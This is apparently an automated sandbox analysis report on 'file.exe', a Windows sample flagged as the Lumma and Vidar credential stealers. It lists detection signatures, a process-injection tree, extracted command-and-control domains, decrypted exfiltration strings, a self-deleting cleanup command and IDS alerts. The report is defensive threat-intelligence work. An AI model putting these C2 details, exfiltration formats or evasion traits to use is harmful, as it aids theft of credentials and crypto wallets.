Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1524997
MD5: c9784db0c88a05a8aae9ddb7289b51db
SHA1: 7ce51feb0e818f5acb6ba4f1deb9f4fef04d7cd6
SHA256: fa8e8dfb272f18daaece8b6ac3f9d6b16f9484764aff1005c9096909d75f760d
Tags: exe user-Bitsight
Infos:

Detection

LummaC, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Country aware sample found (crashes after keyboard check)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 3636 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C9784DB0C88A05A8AAE9DDB7289B51DB)
    • MSBuild.exe (PID: 3404 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 3456 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 3832 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • CBFCFBFBFB.exe (PID: 900 cmdline: "C:\ProgramData\CBFCFBFBFB.exe" MD5: 49504D08DC10AECA7D36605D6A20BDE0)
        • MSBuild.exe (PID: 3068 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • MSBuild.exe (PID: 4520 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • MSBuild.exe (PID: 5276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 3640 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 320 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cmd.exe (PID: 3424 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 6864 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 7124 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 308 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": ["treatynreit.site", "questionsmw.stor", "mysterisop.site", "soldiefieop.site", "abnomalrkmu.site", "absorptioniw.site", "snarlypagowo.site", "chorusarorp.site"], "Build id": "H8NgCl--"}
{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "433cd71b7a2bdd3668a493b00ee95630"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.638ad8.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.file.exe.638ad8.1.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
0.2.file.exe.638ad8.1.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.file.exe.638ad8.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
4.2.MSBuild.exe.400000.2.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

                          System Summary

                          Source: Network Connection, Author: Kiran kumar s, oscd.community: Data: DestinationIp: 104.102.49.254, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 3832, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49712

                          AV Detection

                          Source: https://steamcommunity.com/profiles/76561199724331900 URL Reputation: Label: malware
                          Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ URL Reputation: Label: malware
                          Source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "433cd71b7a2bdd3668a493b00ee95630"}
                          Source: 16.2.MSBuild.exe.400000.0.raw.unpack Malware Configuration Extractor: LummaC {"C2 url": ["treatynreit.site", "questionsmw.stor", "mysterisop.site", "soldiefieop.site", "abnomalrkmu.site", "absorptioniw.site", "snarlypagowo.site", "chorusarorp.site"], "Build id": "H8NgCl--"}
                          Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\a43486128347[1].exe Joe Sandbox ML: detected
                          Source: C:\ProgramData\CBFCFBFBFB.exe Joe Sandbox ML: detected
                          Source: file.exe Joe Sandbox ML: detected
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: absorptioniw.site
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: mysterisop.site
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: snarlypagowo.site
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: treatynreit.site
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: chorusarorp.site
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: abnomalrkmu.site
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: soldiefieop.site
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: questionsmw.stor
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: soldiefieop.site
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: TeslaBrowser/5.5
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: - Screen Resoluton:
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: - Physical Installed Memory:
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: Workgroup: -
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: H8NgCl--
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,4_2_004080A1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,4_2_00408048
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,4_2_00411E5D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,4_2_0040A7D8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C896C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,4_2_6C896C80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9EA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,4_2_6C9EA9A0
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49712 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.8:49713 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:56263 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.166.76:443 -> 192.168.2.8:56266 version: TLS 1.2
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                          Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
                          Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                          Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
                          Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000004.00000002.2221135617.000000003823A000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000004.00000002.2215082591.000000002C352000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
                          Source: Binary string: nss3.pdb source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
                          Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062735B FindFirstFileExW,0_2_0062735B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_0041543D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,4_2_00414CC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00409D1C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040D5C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0040B5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00401D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0040BF4D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00415FD1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040B93F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00415B0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0040CD37
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B0735B FindFirstFileExW,13_2_00B0735B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_00415142
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\

                          Networking

                          Source: Network trafficSuricata IDS: 2056394 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (absorptioniw .site) : 192.168.2.8:50732 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056400 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mysterisop .site) : 192.168.2.8:55865 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056402 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionsmw .store) : 192.168.2.8:54212 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056392 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abnomalrkmu .site) : 192.168.2.8:54546 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056406 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snarlypagowo .site) : 192.168.2.8:61121 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (treatynreit .site) : 192.168.2.8:59551 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.8:56268 -> 45.132.206.251:80
                          Source: Network trafficSuricata IDS: 2056408 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soldiefieop .site) : 192.168.2.8:52448 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chorusarorp .site) : 192.168.2.8:63060 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.8:56237 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.8:56237
                          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.8:56238
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:56266 -> 172.67.166.76:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:56266 -> 172.67.166.76:443
                          Source: Malware configuration extractorURLs: treatynreit.site
                          Source: Malware configuration extractorURLs: questionsmw.stor
                          Source: Malware configuration extractorURLs: mysterisop.site
                          Source: Malware configuration extractorURLs: soldiefieop.site
                          Source: Malware configuration extractorURLs: abnomalrkmu.site
                          Source: Malware configuration extractorURLs: absorptioniw.site
                          Source: Malware configuration extractorURLs: snarlypagowo.site
                          Source: Malware configuration extractorURLs: chorusarorp.site
                          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                          Source: global trafficTCP traffic: 192.168.2.8:56235 -> 162.159.36.2:53
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 03 Oct 2024 13:15:14 GMTContent-Type: application/octet-streamContent-Length: 540536Last-Modified: Thu, 03 Oct 2024 12:52:19 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fe9383-83f78"X-Content-Type-Options: nosniffAccept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 49.12.197.9 49.12.197.9
                          Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                          Source: Joe Sandbox ViewIP Address: 147.45.44.104 147.45.44.104
                          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                          Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56237 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49714 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49713 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49715 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56240 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56239 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56238 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56241 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56244 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56242 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56245 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56247 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56249 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56250 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56251 -> 49.12.197.9:443
